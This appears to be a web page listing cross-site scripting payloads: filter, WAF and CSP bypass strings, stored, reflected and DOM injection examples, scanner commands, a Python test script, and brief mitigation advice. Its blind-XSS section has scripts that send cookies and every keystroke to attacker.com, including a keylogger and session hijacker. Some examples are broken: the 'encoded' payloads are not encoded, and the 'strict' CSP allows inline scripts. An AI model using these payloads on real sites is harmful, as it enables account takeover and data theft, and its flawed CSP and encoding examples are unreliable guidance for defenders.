XSS Payloads
XSS Payloads Comprehensive collection of Cross-Site Scripting (XSS) payloads and bypass techniques. Basic XSS Payloads Simple Alert <script>alert('XSS')</script> <script>alert(1)</script> <script>alert(document.domain)</script> <script>alert(document.cookie)</script> Image Tag <img src=x onerror=alert('XSS')> <img src="javascript:alert('XSS')"> <img src=x onerror=alert(1)> <img src=x onerror=alert(document.cookie)> Input Tag <input onfocus=alert('XSS') autofocus> <input onmouseover=alert('XSS')> <input onfocus=alert(1) autofocus> <input onblur=alert(1) autofocus><input autofocus> Event Handlers Mouse Events <div onmouseover=alert('XSS')>Hover me</div> <div onmouseenter=alert('XSS')>Enter me</div> <div onmouseleave=alert('XSS')>Leave me</div> <div onmousedown=alert('XSS')>Click me</div> <div onmouseup=alert('XSS')>Release me</div> <div onclick=alert('XSS')>Click me</div> <div ondblclick=alert('XSS')>Double click me</div> Keyboard Events <input onkeydown=alert('XSS')> <input onkeyup=alert('XSS')> <input onkeypress=alert('XSS')> <input onkeydown=alert(1)> <input onkeyup=alert(1)> <input onkeypress=alert(1)> Form Events <form onsubmit=alert('XSS')> <input onchange=alert('XSS')> <input oninput=alert('XSS')> <input oninvalid=alert('XSS')> <input onreset=alert('XSS')> <input onsearch=alert('XSS')> Window Events <body onload=alert('XSS')> <body onunload=alert('XSS')> <body onbeforeunload=alert('XSS')> <body onresize=alert('XSS')> <body onscroll=alert('XSS')> <body onfocus=alert('XSS')> <body onblur=alert('XSS')> Filter Bypass Techniques Case Variation <SCRIPT>alert('XSS')</SCRIPT> <ScRiPt>alert('XSS')</ScRiPt> <script>alert('XSS')</script> <SCRIPT>alert('XSS')</SCRIPT> Encoding Bypass <!-- URL Encoding --> %3Cscript%3Ealert('XSS')%3C/script%3E %3Cimg%20src=x%20onerror=alert('XSS')%3E <!-- HTML Entities --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <!-- Hex Encoding --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <!-- Unicode --> \u003cscript\u003ealert('XSS')\u003c/script\u003e Quote Bypass <!-- Without quotes --> <img src=x onerror=alert('XSS')> <img src=x onerror=alert("XSS")> <img src=x onerror=alert(`XSS`)> <img src=x onerror=alert(XSS)> <!-- With different quote types --> <img src=x onerror=alert('XSS')> <img src=x onerror=alert("XSS")> <img src=x onerror=alert(`XSS`)> Space Bypass <!-- Tab --> <img src=x onerror=alert('XSS')> <!-- Newline --> <img src=x onerror=alert('XSS')> <!-- Carriage return --> <img src=x onerror=alert('XSS')> <!-- Form feed --> <img src=x onerror=alert('XSS')> Comment Bypass <!-- HTML Comments --> <img src=x onerror=alert('XSS')><!-- <img src=x onerror=alert('XSS')>--> <!-- JavaScript Comments --> <script>/*comment*/alert('XSS')</script> <script>//comment alert('XSS')</script> Advanced Bypass Techniques WAF Bypass <!-- OWASP ModSecurity --> <svg onload=alert('XSS')> <iframe onload=alert('XSS')> <object onload=alert('XSS')> <embed onload=alert('XSS')> <!-- Cloudflare --> <img src=x onerror=alert('XSS')> <img src=x onerror=alert('XSS')> <img src=x onerror=alert('XSS')> CSP Bypass <!-- Nonce bypass --> <script nonce="random">alert('XSS')</script> <!-- Hash bypass --> <script>alert('XSS')</script> <!-- Source bypass --> <script src="data:text/javascript,alert('XSS')"></script> <script src="javascript:alert('XSS')"></script> DOM-based XSS // URL Fragment #<script>alert('XSS')</script> #<img src=x onerror=alert('XSS')> // Hash change window.location.hash = "<script>alert('XSS')</script>"; // Document write document.write('<script>alert("XSS")</script>'); // InnerHTML element.innerHTML = '<script>alert("XSS")</script>'; // Eval eval('alert("XSS")'); Stored XSS Payloads Profile Fields <!-- Name field --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <!-- Bio field --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> <!-- Comment field --> <script>alert('XSS')</script> <img src=x onerror=alert('XSS')> File Upload <!-- Image file --> <img src=x onerror=alert('XSS')> <!-- SVG file --> <svg onload=alert('XSS')> <!-- HTML file --> <script>alert('XSS')</script> Reflected XSS Payloads URL Parameters <!-- GET parameter --> ?search=<script>alert('XSS')</script> ?search=<img src=x onerror=alert('XSS')> <!-- POST parameter --> username=<script>alert('XSS')</script> password=<img src=x onerror=alert('XSS')> Headers <!-- User-Agent --> User-Agent: <script>alert('XSS')</script> <!-- Referer --> Referer: <script>alert('XSS')</script> <!-- X-Forwarded-For --> X-Forwarded-For: <script>alert('XSS')</script> Blind XSS Payloads Data Exfiltration <!-- Basic exfiltration --> <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/steal?data=' + document.cookie); xhr.send(); </script> <!-- Image exfiltration --> <img src="http://attacker.com/steal?data=document.cookie"> <!-- Form exfiltration --> <form action="http://attacker.com/steal" method="post"> <input type="hidden" name="data" value="document.cookie"> </form> Keylogger <script> document.addEventListener('keypress', function(e) { var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/keylog?key=' + e.key); xhr.send(); }); </script> Session Hijacking <script> var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://attacker.com/session?cookie=' + document.cookie); xhr.send(); </script> Mobile XSS Payloads Touch Events <div ontouchstart=alert('XSS')>Touch me</div> <div ontouchend=alert('XSS')>Touch me</div> <div ontouchmove=alert('XSS')>Touch me</div> <div ontouchcancel=alert('XSS')>Touch me</div> Orientation Events <div onorientationchange=alert('XSS')>Rotate me</div> <div onresize=alert('XSS')>Resize me</div> Testing Tools XSSer # Basic scan xsser --url="http://target.com/page.php?search=test" # With payloads xsser --url="http://target.com/page.php?search=test" --payload="<script>alert('XSS')</script>" # With encoding xsser --url="http://target.com/page.php?search=test" --encode XSStrike # Basic scan python3 xsstrike.py -u "http://target.com/page.php?search=test" # With crawling python3 xsstrike.py -u "http://target.com/page.php?search=test" --crawl # With blind XSS python3 xsstrike.py -u "http://target.com/page.php?search=test" --blind Custom Script import requests import re def test_xss(url, param, payload): data = {param: payload} response = requests.post(url, data=data) if payload in response.text: print(f"XSS detected: {payload}") elif "alert" in response.text.lower(): print(f"XSS detected: {payload}") # Test payloads payloads = [ "<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>", "<svg onload=alert('XSS')>", "<iframe onload=alert('XSS')>" ] for payload in payloads: test_xss("http://target.com/search.php", "query", payload) Prevention and Mitigation Input Validation # Whitelist validation import re def validate_input(input_str): # Allow only alphanumeric and basic punctuation pattern = r'^[a-zA-Z0-9\s.,!?]+$' return re.match(pattern, input_str) is not None Output Encoding import html def encode_output(input_str): return html.escape(input_str) Content Security Policy <!-- Strict CSP --> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline';"> <!-- Nonce-based CSP --> <meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-random'"> Testing Checklist Test all input fields Test with different HTTP methods Test with different content types Test with different encodings Test with different quote types Test with different event handlers Test with different tag types Test with different bypass techniques Test with different WAF bypasses Test with different CSP bypasses